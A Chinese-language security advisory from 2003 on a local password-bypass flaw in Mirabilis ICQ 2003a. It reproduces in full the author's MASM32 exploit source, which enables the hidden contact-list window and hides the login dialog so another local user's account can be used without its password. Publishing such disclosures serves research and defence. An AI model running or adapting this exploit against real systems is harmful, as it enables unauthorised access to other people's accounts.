安全研究

安全漏洞
Mirabilis ICQ口令认证绕过漏洞

发布日期:2003-07-05
更新日期:2003-07-14

受影响系统:
Mirabilis ICQ 2003 a Build 3800
Mirabilis ICQ 2003 a Build 3799
Mirabilis ICQ 2003 a Build 3777
描述:
BUGTRAQ  ID: 8111

Mirabilis ICQ是一款流行的即时通信软件。

Mirabilis ICQ存在设计问题,本地攻击者可以利用部分API,访问使用其他用户ICQ。

使用EnableWindow API函数激活ICQ联系列表(Contact List)窗口,在窗口激活后就可以设置ICQ状态为在线,无需任何密码检查访问使用其他用户的帐户。

<*来源:"Caua" Moura Prado (mouraprado@infoguerra.com.br
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105760672128834&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

"Caua" Moura Prado (mouraprado@infoguerra.com.br)提供了如下测试方法:

; ?????????????????????????????????????????????????????
????????????????????
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT
HERE - CUT HERE      BOF
; -----------------------------------------------------
--------------------
;
;  07/02/2003 - ca1-icq.asm
;  ICQ Password Bypass exploit.
;  written by Cau? Moura Prado (aka ca1)
;  mouraprado@infoguerra.com.br - ICQ 373313
;
;  This exploit allows you to login to ICQ server
using any account registered *locally*
;  no matter the 'save password' option is checked or
not. High level security is also bypassed.
;  All you have to do is run the exploit and set
status property using your mouse when the flower
;  is yellow. If you accidentally set status to
offline then you will need to restart ICQ and run
;  the exploit again. Greets to: Alex Demchenko(aka
Coban), my cousin Rhenan for testing the exploit
;  on his machine and that tiny Israeli company for
starting the whole thing. Oh sure.. hehehe
;  I can't forget...  many kisses to those 3 chicks
from my building for being so hot!! ;)
;
;
;        uh-oh!
;         ___    
;      __/   \__  
;     /  \___/  \        Vulnerable:
;     \__/+ +\__/          ICQ Pro 2003a Build #3800
;     /   ~~~   ;     \__/   \__/        Not Vulnerable:
;        \___/             ICQ Lite alpha Build 1211
;                          ICQ 2001b and ICQ 2002a
;    tHe Flaw Power        All other versions were not
tested.                      
;                                                      
                           coded with masm32
;
_______________________________________________________
________________________exploit born in .br
        
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh
mov hWndLogin, eax  
.if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin
invoke EnableWindow, eax, 1      ;Enable ICQ contact
list
invoke ShowWindow, hWndLogin, 0  ;get rid of Login
screen (don't kill this window)
invoke ExitProcess, 0            ;uhuu.. cya! i gotta
sleep!
end _entrypoint

; ?????????????????????????????????????????????????????
????????????????????
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT
HERE - CUT HERE      EOF
; -----------------------------------------------------
--------------------

建议:
厂商补丁:

Mirabilis
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.icq.com

浏览次数:3151
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障